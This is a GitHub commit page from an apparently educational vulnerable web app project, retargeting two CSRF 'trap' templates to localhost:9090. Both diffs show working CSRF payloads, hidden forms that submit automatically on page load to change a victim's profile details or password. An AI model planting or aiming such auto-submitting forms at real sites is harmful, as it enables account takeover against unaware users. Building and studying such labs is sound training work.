Skip to content

Commit

Permalink
fix: 🐛 fix CSRF trap redirect form to suit for localhost
Browse files Browse the repository at this point in the history
  • Loading branch information
Hardwolf authored and Hardwolf committed Jun 8, 2020
1 parent 13c8ffd commit d2febd4
Show file tree
Hide file tree
Showing 4 changed files with 2 additions and 42 deletions.
1 change: 0 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,6 @@ So, Use for educational or research purposes only

## Image

<img width="1784" alt="loginPage" src="https://user-images.githubusercontent.com/22651097/73920112-1f2f9700-4908-11ea-855d-573007d440e1.png">


## How to Run
Expand Down
2 changes: 1 addition & 1 deletion Trap/DetailCSRF.gtpl
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
<link rel="stylesheet" href="./assets/style.css" type="text/css">
<body onload="document.csrf.submit();">
<p>aaaaa</p>
<form name="csrf" action="http://localhost/profile/edit/update" method="POST">
<form name="csrf" action="http://localhost:9090/profile/edit/update" method="POST">
<input type="hidden" name="username" value="Hacked!!">
<input type="hidden" name="age" value="2048">
<input type="hidden" name="mail" value="[email protected]">
Expand Down
2 changes: 1 addition & 1 deletion Trap/PasswdCSRF.gtpl
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
<link rel="stylesheet" href="./assets/style.css" type="text/css">
<body onload="document.csrf.submit();">
<p>aaaaa</p>
<form name="csrf" action="http://localhost/profile/compchangepasswd" method="POST">
<form name="csrf" action="http://localhost:9090/profile/compchangepasswd" method="POST">
<input type="hidden" name="passwd" value="bouyadakarasa...">
<input type="hidden" name="confirm" value="bouyadakarasa...">
<input type="submit" value="submit">
Expand Down
39 changes: 0 additions & 39 deletions runenv/docker-compose.yml

This file was deleted.

0 comments on commit d2febd4

Please sign in to comment.